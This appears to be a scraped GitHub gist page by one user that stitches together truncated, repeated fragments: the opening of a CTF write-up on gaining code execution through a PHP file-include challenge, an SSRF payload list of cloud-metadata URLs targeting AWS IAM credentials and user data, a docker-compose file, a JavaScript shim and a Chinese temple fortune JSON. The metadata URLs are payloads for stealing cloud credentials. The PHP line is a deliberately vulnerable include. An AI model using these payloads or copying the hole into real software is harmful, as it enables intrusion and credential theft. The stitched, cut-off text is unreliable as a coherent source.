maple maple3142

## writeup.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                maple3142
                / writeup.md
            
            
              Created
              December 31, 2021 05:45
                — forked from loknop/writeup.md
            
              
                Solving "includer's revenge" from hxp ctf 2021 without controlling any files
              
          
    Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

  
## cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

## docker-stack.yml
version: '3'
services:
  ide:
    image: chinodesuuu/coder:latest
    volumes:
      - /home/coder/projects
    ports:
      - '9000:9000'
      - '8888:8888'

## onbeforescriptexecute.js
// 'beforescriptexecute' event [es5]
// original version: https://gist.github.com/jspenguin2017/cd568a50128c71e515738413cd09a890

;(function() {
	;('use strict')
	function Event(script, target) {
		this.script = script
		this.target = target

		this._cancel = false

## 淺草籤.json
[
    {
        "id": "1",
        "type": "大吉",
        "poem": "七寶浮圖塔，高峰頂上安，眾人皆仰望，莫作等閒看",
        "explain": "就像出現了用美麗寶石做成的佛塔般地，似乎會有非常好的事情。因為能改用放眼萬事的立場，可以得到周圍的人們的信賴吧。合乎正道的你的行為，能被很多人的認同及鼓勵。不用隨便的態度看事情，用正確的心思會招來更多的好的結果。",
        "result": {
            "願望": "會充分地實現吧。",
            "疾病": "會治癒吧。",
            "盼望的人": "會出現吧。",

## 淺草籤.json
[
    {
        "id": "1",
        "type": "大吉",
        "poem": "七寶浮圖塔，高峰頂上安，眾人皆仰望，莫作等閒看",
        "explain": "就像出現了用美麗寶石做成的佛塔般地，似乎會有非常好的事情。因為能改用放眼萬事的立場，可以得到周圍的人們的信賴吧。合乎正道的你的行為，能被很多人的認同及鼓勵。不用隨便的態度看事情，用正確的心思會招來更多的好的結果。",
        "result": {
            "願望": "會充分地實現吧。",
            "疾病": "會治癒吧。",
            "盼望的人": "會出現吧。",
	## IPv6 Tests
	http://[::ffff:169.254.169.254]
	http://[0:0:0:0:0:ffff:169.254.169.254]

	## AWS
	# Amazon Web Services (No Header Required)
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
	http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	version: '3'
	services:
	ide:
	image: chinodesuuu/coder:latest
	volumes:
	- /home/coder/projects
	ports:
	- '9000:9000'
	- '8888:8888'
	// 'beforescriptexecute' event [es5]
	// original version: https://gist.github.com/jspenguin2017/cd568a50128c71e515738413cd09a890

	;(function() {
	;('use strict')
	function Event(script, target) {
	this.script = script
	this.target = target

	this._cancel = false
	[
	{
	"id": "1",
	"type": "大吉",
	"poem": "七寶浮圖塔，高峰頂上安，眾人皆仰望，莫作等閒看",
	"explain": "就像出現了用美麗寶石做成的佛塔般地，似乎會有非常好的事情。因為能改用放眼萬事的立場，可以得到周圍的人們的信賴吧。合乎正道的你的行為，能被很多人的認同及鼓勵。不用隨便的態度看事情，用正確的心思會招來更多的好的結果。",
	"result": {
	"願望": "會充分地實現吧。",
	"疾病": "會治癒吧。",
	"盼望的人": "會出現吧。",